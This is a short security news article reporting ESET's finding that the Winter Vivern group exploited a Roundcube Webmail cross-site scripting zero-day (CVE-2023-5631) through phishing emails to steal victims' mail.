Winter Vivern Targets Roundcube’s Zero-Day Vulnerability

The cybercriminals under the pseudonym Winter Vivern were observed exploiting a zero-day vulnerability in the Roundcube Webmail software. These attacks were first detected on October 11th of this year, with the hackers’ primary objective being the theft of emails from the victims’ accounts.

Researchers from ESET, having discovered the assault, reported a resurgence in Winter Vivern’s activities. The experts highlighted that this group had previously exploited other known vulnerabilities in Roundcube and Zimbra.

Over recent months, they have been attributed with attacks against Ukraine and Poland, as well as governmental institutions across Europe and India.

Malicious email message

The new vulnerability, as revealed by ESET specialists, is identified as CVE-2023-5631 and has a CVSS score of 5.4. It permits remote malefactors to upload arbitrary JavaScript code. A patch was released on October 14th of the same year.

Attack chains orchestrated by Winter Vivern commence with a phishing message, which incorporates a payload in Base64 encoding within the HTML source code. This, in turn, is decoded to inject JavaScript from a remote server by leveraging a cross-site scripting (XSS) vulnerability.

Matthieu Faou, a researcher at ESET, elucidated, “By sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.”

“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities,” emphasized Faou.